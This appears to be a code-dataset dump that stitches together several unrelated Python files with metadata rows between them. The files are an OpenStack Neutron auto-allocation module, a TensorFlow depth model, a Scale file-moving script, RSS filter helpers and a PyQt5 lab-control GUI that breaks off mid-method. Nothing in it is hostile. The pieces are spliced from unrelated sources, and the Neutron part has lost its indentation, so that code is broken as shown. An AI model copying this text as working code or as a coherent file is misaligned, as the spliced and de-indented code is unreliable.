filters={'network_id': [topology['network_id']]})
self._cleanup(
context, network_id=topology['network_id'],
router_id=topology['router_id'], subnets=subnets)
def _build_topology(self, context, tenant_id, default_external_network):
"""Build the network topology and returns its network UUID."""
try:
subnets = self._provision_tenant_private_network(
context, tenant_id)
network_id = subnets[0]['network_id']
router = self._provision_external_connectivity(
context, default_external_network, subnets, tenant_id)
network_id = self._save(
context, tenant_id, network_id, router['id'], subnets)
return network_id
except exceptions.UnknownProvisioningError as e:
# Clean partially provisioned topologies, and reraise the
# error. If it can be retried, so be it.
LOG.error("Unknown error while provisioning topology for "
"tenant %(tenant_id)s. Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
self._cleanup(
context, network_id=e.network_id,
router_id=e.router_id, subnets=e.subnets)
raise e.error
def _check_requirements(self, context, tenant_id):
"""Raise if requirements are not met."""
self._get_default_external_network(context)
try:
self._get_supported_subnetpools(context)
except n_exc.NotFound:
raise exceptions.AutoAllocationFailure(
reason=_("No default subnetpools defined"))
return {'id': 'dry-run=pass', 'tenant_id': tenant_id}
def _validate(self, context, tenant_id):
"""Validate and return the tenant to be associated to the topology."""
if tenant_id == 'None':
# NOTE(HenryG): the client might be sending us astray by
# passing no tenant; this is really meant to be the tenant
# issuing the request, therefore let's get it from the context
tenant_id = context.tenant_id
if not context.is_admin and tenant_id != context.tenant_id:
raise n_exc.NotAuthorized()
return tenant_id
def _get_auto_allocated_topology(self, context, tenant_id):
"""Return the auto allocated topology record if present or None."""
return auto_allocate_obj.AutoAllocatedTopology.get_object(
context, project_id=tenant_id)
def _get_auto_allocated_network(self, context, tenant_id):
"""Get the auto allocated network for the tenant."""
network = self._get_auto_allocated_topology(context, tenant_id)
if network:
return network['network_id']
@staticmethod
def _response(network_id, tenant_id, fields=None):
"""Build response for auto-allocated network."""
res = {
'id': network_id,
'tenant_id': tenant_id
}
return db_utils.resource_fields(res, fields)
def _get_default_external_network(self, context):
"""Get the default external network for the deployment."""
default_external_networks = net_obj.ExternalNetwork.get_objects(
context, is_default=True)
if not default_external_networks:
LOG.error("Unable to find default external network "
"for deployment, please create/assign one to "
"allow auto-allocation to work correctly.")
raise exceptions.AutoAllocationFailure(
reason=_("No default router:external network"))
if len(default_external_networks) > 1:
LOG.error("Multiple external default networks detected. "
"Network %s is true 'default'.",
default_external_networks[0]['network_id'])
return default_external_networks[0].network_id
def _get_supported_subnetpools(self, context):
"""Return the default subnet pools available."""
default_subnet_pools = [
self.core_plugin.get_default_subnetpool(
context, ver) for ver in (4, 6)
]
available_pools = [
s for s in default_subnet_pools if s
]
if not available_pools:
LOG.error("No default pools available")
raise n_exc.NotFound()
return available_pools
def _provision_tenant_private_network(self, context, tenant_id):
"""Create a tenant private network/subnets."""
network = None
try:
network_args = {
'name': 'auto_allocated_network',
'admin_state_up': False,
'tenant_id': tenant_id,
'shared': False
}
network = p_utils.create_network(
self.core_plugin, context, {'network': network_args})
subnets = []
for pool in self._get_supported_subnetpools(context):
subnet_args = {
'name': 'auto_allocated_subnet_v%s' % pool['ip_version'],
'network_id': network['id'],
'tenant_id': tenant_id,
'ip_version': pool['ip_version'],
'subnetpool_id': pool['id'],
}
subnets.append(p_utils.create_subnet(
self.core_plugin, context, {'subnet': subnet_args}))
return subnets
except (c_exc.SubnetAllocationError, ValueError,
n_exc.BadRequest, n_exc.NotFound) as e:
LOG.error("Unable to auto allocate topology for tenant "
"%(tenant_id)s due to missing or unmet "
"requirements. Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
if network:
self._cleanup(context, network['id'])
raise exceptions.AutoAllocationFailure(
reason=_("Unable to provide tenant private network"))
except Exception as e:
network_id = network['id'] if network else None
raise exceptions.UnknownProvisioningError(e, network_id=network_id)
def _provision_external_connectivity(
self, context, default_external_network, subnets, tenant_id):
"""Uplink tenant subnet(s) to external network."""
router_args = {
'name': 'auto_allocated_router',
l3.EXTERNAL_GW_INFO: {'network_id': default_external_network},
'tenant_id': tenant_id,
'admin_state_up': True
}
router = None
attached_subnets = []
try:
router = self.l3_plugin.create_router(
context, {'router': router_args})
for subnet in subnets:
self.l3_plugin.add_router_interface(
context, router['id'], {'subnet_id': subnet['id']})
attached_subnets.append(subnet)
return router
except n_exc.BadRequest as e:
LOG.error("Unable to auto allocate topology for tenant "
"%(tenant_id)s because of router errors. "
"Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
router_id = router['id'] if router else None
self._cleanup(context,
network_id=subnets[0]['network_id'],
router_id=router_id, subnets=attached_subnets)
raise exceptions.AutoAllocationFailure(
reason=_("Unable to provide external connectivity"))
except Exception as e:
router_id = router['id'] if router else None
raise exceptions.UnknownProvisioningError(
e, network_id=subnets[0]['network_id'],
router_id=router_id, subnets=subnets)
def _save(self, context, tenant_id, network_id, router_id, subnets):
"""Save auto-allocated topology, or revert in case of DB errors."""
try:
auto_allocate_obj.AutoAllocatedTopology(
context, project_id=tenant_id, network_id=network_id,
router_id=router_id).create()
self.core_plugin.update_network(
context, network_id,
{'network': {'admin_state_up': True}})
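            # The network was created admin-down in
            # _provision_tenant_private_network; it is only flipped admin-up
            # here, once the topology row has been persisted, presumably so a
            # half-built topology is never exposed as usable.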
except obj_exc.NeutronDbObjectDuplicateEntry:
LOG.debug("Multiple auto-allocated networks detected for "
"tenant %s. Attempting clean up for network %s "
"and router %s.",
tenant_id, network_id, router_id)
self._cleanup(
context, network_id=network_id,
router_id=router_id, subnets=subnets)
network_id = self._get_auto_allocated_network(context, tenant_id)
except Exception as e:
raise exceptions.UnknownProvisioningError(
e, network_id=network_id,
router_id=router_id, subnets=subnets)
return network_id
def _cleanup(self, context, network_id=None, router_id=None, subnets=None):
"""Clean up auto allocated resources."""
# Concurrent attempts to delete the topology may interleave and
# cause some operations to fail with NotFound exceptions. Rather
# than fail partially, the exceptions should be ignored and the
# cleanup should proceed uninterrupted.
if router_id:
for subnet in subnets or []:
ignore_notfound(
self.l3_plugin.remove_router_interface,
context, router_id, {'subnet_id': subnet['id']})
ignore_notfound(self.l3_plugin.delete_router, context, router_id)
if network_id:
ignore_notfound(
self.core_plugin.delete_network, context, network_id)
def ignore_notfound(func, *args, **kwargs):
"""Call the given function and pass if a `NotFound` exception is raised."""
try:
return func(*args, **kwargs)
except n_exc.NotFound:
pass
|
apache-2.0
| 3,746,684,057,430,448,000
| 42.740741
| 79
| 0.610016
| false
| 4.374074
| false
| false
| false
|
min2209/dwt
|
WTN/depth_model.py
|
1
|
6876
|
import numpy as np
from math import ceil
import tensorflow as tf
import math
import scipy.io as sio
VGG_MEAN = [103.939, 116.779, 123.68]
class Network:
def __init__(self, params, wd=5e-5, modelWeightPaths=None):
self._params = params
self._images = tf.placeholder("float")
self._batch_images = tf.expand_dims(self._images, 0)
self._gt = tf.placeholder("float")
self._batch_gt = tf.expand_dims(self._gt, 0)
self._wd = wd
self.modelDict = {}
if modelWeightPaths is not None:
for path in modelWeightPaths:
self.modelDict.update(sio.loadmat(path))
def build(self, inputData, ss, keepProb=1):
self.conv1_1 = self._conv_layer(inputData, params=self._params["depth/conv1_1"])
self.conv1_2 = self._conv_layer(self.conv1_1, params=self._params["depth/conv1_2"])
self.pool1 = self._average_pool(self.conv1_2, 'depth/pool')
self.conv2_1 = self._conv_layer(self.pool1, params=self._params["depth/conv2_1"])
self.conv2_2 = self._conv_layer(self.conv2_1, params=self._params["depth/conv2_2"])
self.conv2_3 = self._conv_layer(self.conv2_2, params=self._params["depth/conv2_3"])
self.conv2_4 = self._conv_layer(self.conv2_3, params=self._params["depth/conv2_4"])
self.pool2 = self._average_pool(self.conv2_4, 'depth/pool')
self.fcn1 = self._conv_layer_dropout(self.pool2, params=self._params["depth/fcn1"], keepProb=keepProb)
self.fcn2 = self._conv_layer_dropout(self.fcn1, params=self._params["depth/fcn2"], keepProb=keepProb)
self.outputData = self._upscore_layer(self.fcn2, params=self._params["depth/upscore"],
shape=tf.shape(inputData))
        self.outputDataArgMax = tf.argmax(input=self.outputData, axis=3)
def _max_pool(self, bottom, name):
return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name=name)
def _average_pool(self, bottom, name):
return tf.nn.avg_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name=name)
def _conv_layer(self, bottom, params):
with tf.variable_scope(params["name"]) as scope:
filt = self.get_conv_filter(params)
conv = tf.nn.conv2d(bottom, filt, [1, 1, 1, 1], padding='SAME')
conv_biases = self.get_bias(params)
if params["act"] == "relu":
activation = tf.nn.relu(tf.nn.bias_add(conv, conv_biases))
elif params["act"] == "lin":
activation = tf.nn.bias_add(conv, conv_biases)
elif params["act"] == "tanh":
activation = tf.nn.tanh(tf.nn.bias_add(conv, conv_biases))
return activation
def _conv_layer_dropout(self, bottom, params, keepProb):
with tf.variable_scope(params["name"]) as scope:
filt = self.get_conv_filter(params)
conv = tf.nn.conv2d(bottom, filt, [1, 1, 1, 1], padding='SAME')
conv_biases = self.get_bias(params)
if params["act"] == "relu":
activation = tf.nn.relu(tf.nn.bias_add(conv, conv_biases))
elif params["act"] == "lin":
activation = tf.nn.bias_add(conv, conv_biases)
elif params["act"] == "tanh":
activation = tf.nn.tanh(tf.nn.bias_add(conv, conv_biases))
activation = tf.nn.dropout(activation, keepProb, seed=0)
return activation
# WEIGHTS GENERATION
def get_bias(self, params):
if params["name"]+"/biases" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/biases"], dtype=tf.float32)
print "loaded " + params["name"] + "/biases"
else:
init = tf.constant_initializer(value=0.0)
print "generated " + params["name"] + "/biases"
var = tf.get_variable(name="biases", initializer=init, shape=params["shape"][3])
return var
def get_conv_filter(self, params):
if params["name"]+"/weights" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/weights"], dtype=tf.float32)
var = tf.get_variable(name="weights", initializer=init, shape=params["shape"])
print "loaded " + params["name"]+"/weights"
else:
if params["std"]:
stddev = params["std"]
else:
fanIn = params["shape"][0]*params["shape"][1]*params["shape"][2]
stddev = (2/float(fanIn))**0.5
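                # He initialization: stddev = sqrt(2 / fan_in), the standard
                # choice for ReLU layers.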
init = tf.truncated_normal(shape=params["shape"], stddev=stddev, seed=0)
var = tf.get_variable(name="weights", initializer=init)
print "generated " + params["name"] + "/weights"
if not tf.get_variable_scope().reuse:
            weightDecay = tf.multiply(tf.nn.l2_loss(var), self._wd,
                                      name='weight_loss')
tf.add_to_collection('losses', weightDecay)
return var
def _upscore_layer(self, bottom, shape, params):
strides = [1, params["stride"], params["stride"], 1]
with tf.variable_scope(params["name"]):
in_features = bottom.get_shape()[3].value
new_shape = [shape[0], shape[1], shape[2], params["outputChannels"]]
            output_shape = tf.stack(new_shape)
f_shape = [params["ksize"], params["ksize"], params["outputChannels"], in_features]
weights = self.get_deconv_filter(f_shape, params)
deconv = tf.nn.conv2d_transpose(bottom, weights, output_shape,
strides=strides, padding='SAME')
return deconv
def get_deconv_filter(self, f_shape, params):
if params["name"]+"/up_filter" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/up_filter"], dtype=tf.float32)
print "loaded " + params["name"]+"/up_filter"
else:
width = f_shape[0]
height = f_shape[0]
f = ceil(width / 2.0)
c = (2 * f - 1 - f % 2) / (2.0 * f)
bilinear = np.zeros([f_shape[0], f_shape[1]])
for x in range(width):
for y in range(height):
value = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
bilinear[x, y] = value
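            # Standard FCN-style bilinear initialization: with f = ceil(k/2)
            # and c = (2f - 1 - f % 2) / (2f), each weight is
            # (1 - |x/f - c|) * (1 - |y/f - c|), so the transposed
            # convolution starts out as exact bilinear upsampling.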
weights = np.zeros(f_shape)
for i in range(f_shape[2]):
weights[:, :, i, i] = bilinear
init = tf.constant_initializer(value=weights,
dtype=tf.float32)
print "generated " + params["name"] + "/up_filter"
return tf.get_variable(name="up_filter", initializer=init, shape=f_shape)
|
mit
| -6,771,102,239,200,756,000
| 41.98125
| 111
| 0.5605
| false
| 3.531587
| false
| false
| false
|
ngageoint/scale
|
scale/storage/move_files_job.py
|
1
|
4159
|
"""Defines the functions necessary to move a file to a different workspace/uri"""
from __future__ import unicode_literals
import logging
import os
import sys
from error.exceptions import ScaleError, get_error_by_exception
from messaging.manager import CommandMessageManager
from storage.brokers.broker import FileDownload, FileMove, FileUpload
from storage.messages.move_files import create_move_file_message
from storage.models import ScaleFile
logger = logging.getLogger(__name__)
GENERAL_FAIL_EXIT_CODE = 1
def move_files(file_ids, new_workspace=None, new_file_path=None):
"""Moves the given files to a different workspace/uri
:param file_ids: List of ids of ScaleFile objects to move; should all be from the same workspace
:type file_ids: [int]
:param new_workspace: New workspace to move files to
:type new_workspace: `storage.models.Workspace`
:param new_file_path: New path for files
:type new_file_path: string
"""
try:
messages = []
files = ScaleFile.objects.all()
files = files.select_related('workspace')
files = files.defer('workspace__json_config')
files = files.filter(id__in=file_ids).only('id', 'file_name', 'file_path', 'workspace')
old_files = []
old_workspace = files[0].workspace
if new_workspace:
# We need a local path to copy the file, try to get a direct path from the broker, if that fails we must
# download the file and copy from there
# TODO: a future refactor should make the brokers work off of file objects instead of paths so the extra
# download is not necessary
paths = old_workspace.get_file_system_paths([files])
local_paths = []
if paths:
local_paths = paths
else:
file_downloads = []
for file in files:
local_path = os.path.join('/tmp', file.file_name)
file_downloads.append(FileDownload(file, local_path, False))
local_paths.append(local_path)
ScaleFile.objects.download_files(file_downloads)
uploads = []
for file, path in zip(files, local_paths):
old_path = file.file_path
old_files.append(ScaleFile(file_name=file.file_name, file_path=file.file_path))
file.file_path = new_file_path if new_file_path else file.file_path
logger.info('Copying %s in workspace %s to %s in workspace %s', old_path, file.workspace.name,
file.file_path, new_workspace.name)
file_upload = FileUpload(file, path)
uploads.append(file_upload)
message = create_move_file_message(file_id=file.id)
messages.append(message)
ScaleFile.objects.upload_files(new_workspace, uploads)
elif new_file_path:
moves = []
for file in files:
logger.info('Moving %s to %s in workspace %s', file.file_path, new_file_path,
file.workspace.name)
moves.append(FileMove(file, new_file_path))
message = create_move_file_message(file_id=file.id)
messages.append(message)
ScaleFile.objects.move_files(moves)
else:
logger.info('No new workspace or file path. Doing nothing')
CommandMessageManager().send_messages(messages)
if new_workspace:
            # Copied files to the new workspace, so delete the files in the old workspace (if the workspace provides a local path to do so)
old_workspace.delete_files(old_files, update_model=False)
except ScaleError as err:
err.log()
sys.exit(err.exit_code)
except Exception as ex:
exit_code = GENERAL_FAIL_EXIT_CODE
err = get_error_by_exception(ex.__class__.__name__)
if err:
err.log()
exit_code = err.exit_code
else:
logger.exception('Error performing move_files steps')
sys.exit(exit_code)
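# A usage sketch (the Workspace lookup is an illustrative assumption):
#     from storage.models import Workspace
#     new_ws = Workspace.objects.get(name='archive')
#     move_files([1, 2, 3], new_workspace=new_ws, new_file_path='moved/files')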
|
apache-2.0
| -5,702,555,513,659,372,000
| 40.178218
| 120
| 0.605674
| false
| 4.150699
| false
| false
| false
|
cuducos/filterss
|
filterss/helpers.py
|
1
|
4366
|
import re
from .forms import FilterForm
from email.utils import parsedate_tz
from filterss import app
from flask import request
from textwrap import wrap
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from werkzeug.local import LocalProxy
from xml.dom.minidom import parse
def set_filter(value):
"""
Return filter as lower case string (for case-insensitive search) or
return None for blank/False values
"""
if value:
return str(value).strip().lower()
return None
def get_filters(obj):
"""
    Gets an object (form, request, etc.) and returns a dictionary with the filters
"""
# if it is a FilterForm object with keys
if type(obj) is FilterForm:
d = obj.data
d['url'] = d['rss_url']
# if it is a GET request
elif type(obj) is LocalProxy:
keys = app.config['FILTERS']
d = dict(zip(keys, map((lambda k: request.args.get(k)), keys)))
# error
else:
return False
# return a dictionary without empty items
return clean_filters(d)
def clean_filters(d):
"""
Delete empty fields from the filters dictionary, strip and convert strings
to lower case
"""
return dict((k, set_filter(v)) for k, v in d.items() if v)
def url_vars(d):
"""
Returns a string with the URL encoded (GET) vars
"""
cleaned = clean_filters(d)
cleaned.pop('rss_url', None)
return urlencode(cleaned)
def connect_n_parse(url):
"""
Connect to a given URL and return the parse of the result
"""
try:
ua = 'Mozilla/5.0'
accept = 'application/rss+xml,application/xhtml+xml,application/xml'
hdr = {'User-Agent': ua, 'Accept': accept}
req = Request(url, headers=hdr)
doc = urlopen(req)
    except Exception:
doc = urlopen(url)
return parse(doc)
def test_conditions(d, title, link):
"""
    Gets a dictionary with the filters and tests them against the values
from the RSS (title and link)
"""
# iterate through the filters
for k in d.keys():
# check if it is a title, link or none (skip)
if k[0:1] == 't':
rss_content = title
elif k[0:1] == 'l':
rss_content = link
else:
rss_content = False
# test the conditions only for title and link
if rss_content:
inclusive = True if k[-3:] == 'inc' else False
cond = test_single_condition(d[k], rss_content, inclusive)
# return false if a match is found
if not cond:
return False
# else, return true
return True
def test_single_condition(condition, value, inclusive):
"""
    Separate multiple conditions separated by commas (filters) and test them for
    a given value; the inclusive boolean decides whether it should or should not
be present in the given value. It always returns a boolean.
"""
if condition is None:
return True
    conditions = condition.split(',')
    for c in conditions:
c = c.strip()
if c and c in value.lower():
return inclusive
return not inclusive
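# e.g. test_single_condition('foo, bar', 'A Foo Story', True) is True (the
# value contains 'foo'); the same call with inclusive=False is False.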
def remove_tags(string):
"""
    Return the string with certain HTML/XML tags removed (title, link and pubDate)
"""
tags = ['title', 'link', 'pubDate']
tags_re = '({})'.format('|'.join(tags))
    starttag_re = re.compile(r'<{}(/?>|(\s+[^>]*>))'.format(tags_re), re.U)
endtag_re = re.compile('</{}>'.format(tags_re))
string = starttag_re.sub('', string)
string = endtag_re.sub('', string)
string = string.replace('<![CDATA[', '')
string = string.replace(']]>', '')
return string.strip()
def word_wrap(txt, length=120):
"""
    Return a wrapped paragraph, adding an ellipsis after the first word that
    appears past a given number of characters (the length parameter)
"""
if len(txt) <= length or length == 0:
return txt
new_txt = wrap(txt, length)
return new_txt[0] + u'…'
def format_date(string):
"""
Return a date & time (dd/mm/yyyy hh:mm) from a rfc822 string format
"""
new_date = parsedate_tz(string)
y = new_date[0]
m = '{0:0>2}'.format(new_date[1])
d = '{0:0>2}'.format(new_date[2])
H = '{0:0>2}'.format(new_date[3])
i = '{0:0>2}'.format(new_date[4])
return '{}/{}/{} {}:{}'.format(d, m, y, H, i)
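# e.g. format_date('Tue, 10 Sep 2024 13:45:00 +0000') returns
# '10/09/2024 13:45'.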
|
mit
| 3,528,421,072,841,698,000
| 26.446541
| 79
| 0.601971
| false
| 3.670311
| true
| false
| false
|
uprm-research-resto/coliform-project
|
Coliform/GUI.py
|
1
|
42197
|
#!/usr/bin/env python3
#
# This is the main GUI function for Coliform Project
#
# This file is part of Coliform. https://github.com/Regendor/coliform-project
# (C) 2016
# Author: Osvaldo E Duran
# Licensed under the GNU General Public License version 3.0 (GPL-3.0)
import os
import time
import sys
try:
import matplotlib
matplotlib.use('Qt5Agg')
from PyQt5.QtCore import QTimer, Qt, QCoreApplication, QObject, pyqtSignal
from PyQt5.QtGui import QColor, QPalette
from PyQt5.QtWidgets import QApplication, QDesktopWidget, QMessageBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtWidgets import QLabel, QMainWindow, QWidget, QGroupBox, QPushButton, QRadioButton, QLineEdit, QFileDialog
except ImportError:
from tkinter import messagebox
    messagebox.showinfo(message='Please close this dialog and install dependencies by typing the following in a terminal:\n'
'python3\n'
'from Coliform import InitialSetup\n'
'InitialSetup.addShortcuts()\n'
'InitialSetup.installDependencies()\n')
from Coliform import OneWire, MultiPlot, RPiGPIO, RPiCamera, RGBSensor
import threading
# from datetime import datetime
'''
import as:
from Coliform import GUI
use as:
GUI.startGUI()
'''
class GUICenterWidget(QWidget):
def __init__(self):
super(GUICenterWidget, self).__init__()
self.initUI()
self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.createTopLeftGroupBox()
self.createTopRightGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QHBoxLayout()
topLayout.addWidget(self.topLeftGroupBox)
topLayout.addWidget(self.topRightGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopLeftGroupBox(self):
self.topLeftGroupBox = QGroupBox("Temperature Sensor")
tempLabel = QLabel('Temperature: ')
self.tempValLabel = QLabel('NULL')
plotButton = QPushButton("Show Plot")
plotButton.clicked.connect(self.tempPlot)
saveDataButton = QPushButton('Save Data File')
saveDataButton.clicked.connect(self.savefile)
vbox1 = QVBoxLayout()
vbox1.addWidget(tempLabel)
vbox1.addWidget(self.tempValLabel)
vbox2 = QVBoxLayout()
vbox2.addWidget(plotButton)
vbox2.addWidget(saveDataButton)
layout = QHBoxLayout()
layout.addLayout(vbox1)
layout.addLayout(vbox2)
layout.addStretch(1)
self.topLeftGroupBox.setLayout(layout)
def createTopRightGroupBox(self):
self.topRightGroupBox = QGroupBox('Heater')
heatLabel = QLabel('Target Temperature(C):')
heatEntry = QLineEdit()
heatEntry.textChanged[str].connect(self.tempOnChanged)
heatEntry.setText('41')
self.heatButton = QPushButton('Heater ON')
self.heatButton.clicked.connect(self.heaterPower)
hbox1 = QHBoxLayout()
hbox1.addWidget(heatLabel)
hbox1.addWidget(heatEntry)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.heatButton)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.topRightGroupBox.setLayout(layout)
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Pump')
self.pumpPowerButton = QPushButton('Power ON')
self.pumpPowerButton.clicked.connect(self.pumpPower)
pumpEntry = QLineEdit()
pumpEntry.textChanged[str].connect(self.pumpOnChanged)
pumpValChangeButton = QPushButton('Submit')
pumpValChangeButton.clicked.connect(self.pumppowerchange)
layout = QVBoxLayout()
layout.addWidget(self.pumpPowerButton)
layout.addWidget(pumpEntry)
layout.addWidget(pumpValChangeButton)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def tempOnChanged(self, text):
if text != '':
self.tempTarget = int(float(text))
def pumpOnChanged(self, text):
if text:
self.pumppwmvalue = int(float(text))
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Status')
self.tempSensorLbl = QLabel('Temp. Sensor OFF')
self.pumpLbl = QLabel('Pump OFF')
self.heatLbl = QLabel('Heater OFF')
layout = QVBoxLayout()
layout.addWidget(self.tempSensorLbl)
layout.addWidget(self.pumpLbl)
layout.addWidget(self.heatLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
    def statusOnChanged(self, text):
        if 'Temp. Sensor' in text:
            self.tempSensorStatus = text
            self.tempSensorLbl.setText(text)
            self.tempSensorLbl.adjustSize()
        elif 'Pump' in text:
            self.pumpStatus = text
            self.pumpLbl.setText(text)
            self.pumpLbl.adjustSize()
        elif 'Heater' in text:
            self.heatStatus = text
            self.heatLbl.setText(text)
            self.heatLbl.adjustSize()
def onewireOn(self):
try:
self.ids = OneWire.getOneWireID()
TemperatureDegrees, self.TemperatureNumber = OneWire.getTempList()
self.tempValLabel.setText(TemperatureDegrees)
MultiPlot.GeneratePlotDataFile(self.tf, self.TemperatureNumber, self.start_time)
if not self.ids:
self.tempSensorLbl.setText('Temp. Sensor OFF')
self.tempValLabel.setText('NULL')
self.tempValLabel.adjustSize()
else:
self.tempSensorLbl.setText('Temp. Sensor ON')
self.tempValLabel.adjustSize()
except IndexError:
pass
def tempPlot(self):
try:
self.y_title_axis = ['Temperature Plot', 'Temperature vs Time', 't(s)', 'T(C)', 'Sensor']
MultiPlot.Plot(self.tf, len(self.ids), self.y_title_axis)
except KeyError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('No temperature sensor connected.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def pumpPower(self):
if 'OFF' in self.pumpLbl.text():
self.PUMPPWM = RPiGPIO.Controller(11, 100)
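            # Controller(11, 100): assumed to be board pin 11 driven at
            # 100 Hz PWM, in the style of RPi.GPIO's PWM(channel, frequency).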
self.PUMPPWM.startup()
self.pumpLbl.setText('Pump ON')
self.pumpPowerButton.setText('Power OFF')
elif 'ON' in self.pumpLbl.text():
self.PUMPPWM.shutdown()
self.pumpLbl.setText('Pump OFF')
self.pumpPowerButton.setText('Power ON')
def savefile(self):
tempfilename = 'TemperatureData.csv'
filepath = QFileDialog.getExistingDirectory(self, 'Choose Directory', os.sep.join((os.path.expanduser('~'), 'Desktop')))
self.y_variablename = 'TemperatureSensor'
MultiPlot.SaveToCsv(self.tf, tempfilename, filepath, len(self.ids), self.y_variablename)
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Information')
mb.setText('File saved to directory.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def heaterPower(self):
if 'OFF' in self.heatLbl.text():
self.heatLbl.setText('Heater ON')
self.heatButton.setText('Power OFF')
self.HEATPWM = RPiGPIO.Controller(12, 100)
self.HEATPWM.startup()
elif 'ON' in self.heatLbl.text():
self.HEATPWM.shutdown()
self.heatLbl.setText('Heater OFF')
self.heatButton.setText('Power ON')
def heaterinput(self):
if self.heatLbl.text() != 'Heater OFF':
value = float(self.tempTarget)
sensor = float(self.TemperatureNumber[1])
self.HEATPWM.HeaterPID(value, sensor)
def pumppowerchange(self):
try:
if self.pumppwmvalue > 100:
raise ValueError
else:
self.PUMPPWM.setIntensity(self.pumppwmvalue)
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Please type in a value between 0-100.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
class GUIMainWindow(QMainWindow):
def __init__(self):
super(GUIMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = GUICenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.statusBar().showMessage('Ready')
self.center()
self.setWindowTitle('Coliform Control GUI')
self.onewiretimer = QTimer(self)
self.onewiretimer.timeout.connect(self.cwidget.onewireOn)
self.onewiretimer.start(1000)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def quitApp(self):
QCoreApplication.instance().quit()
class CameraCenterWidget(QWidget):
def __init__(self):
super(CameraCenterWidget, self).__init__()
self.initUI()
# self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.statusbar = 'Ready'
self.createTopGroupBox()
self.createMidTopGroupBox()
self.createMidBottomGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QVBoxLayout()
topLayout.addWidget(self.topGroupBox)
topLayout.addWidget(self.midTopGroupBox)
topLayout.addWidget(self.midBottomGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopGroupBox(self):
self.topGroupBox = QGroupBox("Camera Capture Parameters")
delayLbl = QLabel('Delay:')
self.delayEntry = QLineEdit()
self.delayEntry.setText('5')
brightLbl = QLabel('Brightness:')
self.brightEntry = QLineEdit()
self.brightEntry.setText('50')
contrastLbl = QLabel('Contrast:')
self.contrastEntry = QLineEdit()
self.contrastEntry.setText('0')
        shutterLbl = QLabel('Shutter Speed (μs):')
self.shutterEntry = QLineEdit()
self.shutterEntry.setText('0')
# Line 2
isoLbl = QLabel('ISO:')
self.isoEntry = QLineEdit()
self.isoEntry.setText('0')
prevTimeLbl = QLabel('Preview Timeout:')
self.prevTimeEntry = QLineEdit()
self.prevTimeEntry.setText('10')
resLbl = QLabel('Resolution:')
self.resEntry = QLineEdit()
self.resEntry.setText('2592x1944')
zoomLbl = QLabel('Zoom:')
self.zoomEntry = QLineEdit()
self.zoomEntry.setText('0.0, 0.0, 1.0, 1.0')
hbox1 = QHBoxLayout()
hbox1.addWidget(delayLbl)
hbox1.addWidget(self.delayEntry)
hbox1.addWidget(brightLbl)
hbox1.addWidget(self.brightEntry)
hbox1.addWidget(contrastLbl)
hbox1.addWidget(self.contrastEntry)
hbox1.addWidget(shutterLbl)
hbox1.addWidget(self.shutterEntry)
hbox2 = QHBoxLayout()
hbox2.addWidget(isoLbl)
hbox2.addWidget(self.isoEntry)
hbox2.addWidget(prevTimeLbl)
